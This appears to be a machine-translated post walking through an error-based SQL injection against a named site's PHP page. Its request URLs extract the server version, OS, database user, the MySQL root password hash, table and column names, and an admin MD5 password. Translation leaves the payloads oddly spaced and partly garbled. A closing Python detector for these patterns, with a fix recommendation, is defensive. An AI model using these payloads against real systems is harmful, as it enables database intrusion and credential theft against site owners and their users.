P.S. The original requests used %20; I replaced it with /**/ to make them easier to read.
Determine the version:
Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/**/@ version/**/), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23
Determine the operating system:
Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/**/@ version_compile_ OS/**/), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23
Current user, user():
Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/**/user ()/**/), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23
Current database, database():
Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/**/database ()/**/), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23
Extract the root password hash:
Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/**/Password/**/from/**/mysql. user/**/where/**/User = char (114,111,111,116), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23
Table names in the current database:
Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/**/TABLE_NAME/** // **/from/**/information_schema.tables/**/where/**/TABLE_SCHEMA = char (115,97, 110,115, 97,110, 49)/**/limit/**/6, 1), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23
The user_name field in the current database:
Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/** // **/COLUMN_NAME/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_SCHEMA = char (115,97, 110,115, 97,110, 49)/**/and/**/TABLE_NAME = char (97,100,109,105,110, 99, 115,95, 95,117,115,101,114,)/**/limit/**/), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23
The password field in the current database:
Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/** // **/COLUMN_NAME/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_SCHEMA = char (115,97, 110,115, 97,110, 49)/**/and/**/TABLE_NAME = char (97,100,109,105,110, 99, 115,95, 95,117,115,101,114,)/**/limit/**/), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23
Obtain the admin password (MD5):
Http://www.bkjia.com/tmd. php? Id = 352 & wsid = 1/**/and/**/(1, 1) % 3E (select/**/count (*), concat (select/**/concat_ws (char (94), ifnull (cast (% 60 password % 60/**/as/**/char ), char (32), ifnull (cast (% 60user_name % 60/**/as/**/char), char (32 ))) /** // **/from/**/sansan1.ecs _ admin_user/**/limit/**/), 0x3a, floor (rand () * 2 )) /**/x/**/from/**/(select/**/1/**/union/**/select/**/2) /**/a/**/group/**/by/**/x/**/limit/**/1) % 23
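Seen from the log side, every request above shares the same skeleton once %20 and /**/ are treated as the same separator. The following detector is an added example, not part of the original post; the rule names and the abbreviated sample query strings are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Signatures for the constructs visible in the requests listed above.
RULES = {
    "rand_group_by": re.compile(r"floor ?\( ?rand ?\(.*?\).*?group by"),
    "count_concat": re.compile(r"count ?\( ?\* ?\).*concat ?\("),
    "information_schema": re.compile(r"information_schema ?\. ?(tables|columns)"),
    "mysql_user": re.compile(r"mysql ?\. ?user"),
    "char_encoded_string": re.compile(r"char ?\( ?\d+( ?, ?\d+){2,}"),
}


def normalize(query: str) -> str:
    """Reduce a raw query string to one canonical form before matching."""
    # Percent-decode a bounded number of times so %20 and %2520 both become a space.
    for _ in range(3):
        decoded = unquote(query)
        if decoded == query:
            break
        query = decoded
    # Drop only the comment delimiters: /**/ becomes whitespace, while the body
    # of a MySQL versioned comment (/*!50000 ... */), which the server executes,
    # stays visible to the rules.
    query = re.sub(r"/\*!?\d*|\*/", " ", query)
    return re.sub(r"\s+", " ", query).lower()


def classify(query: str) -> list:
    """Return the sorted names of all rules that match the normalized query."""
    text = normalize(query)
    return sorted(name for name, rx in RULES.items() if rx.search(text))


# Constructed, abbreviated samples in the shape of the requests above.
SAMPLE_ERROR_BASED = ("id=352&wsid=1/**/and/**/(select/**/count(*),concat(user(),0x3a,"
                      "floor(rand()*2))x/**/from/**/t/**/group/**/by/**/x)")
SAMPLE_SCHEMA = ("id=352&wsid=1/**/and/**/(select/**/TABLE_NAME/**/from/**/"
                 "information_schema.tables/**/where/**/TABLE_SCHEMA=char(115,97,110))")
SAMPLE_BENIGN = "id=352&wsid=1"

if __name__ == "__main__":
    for q in (SAMPLE_ERROR_BASED, SAMPLE_SCHEMA, SAMPLE_BENIGN):
        print(classify(q), q[:48])
```

Matching on the normalized string is what makes the /**/ and %20 variants equivalent; the durable fix remains binding `wsid` as a typed parameter in the query behind the page.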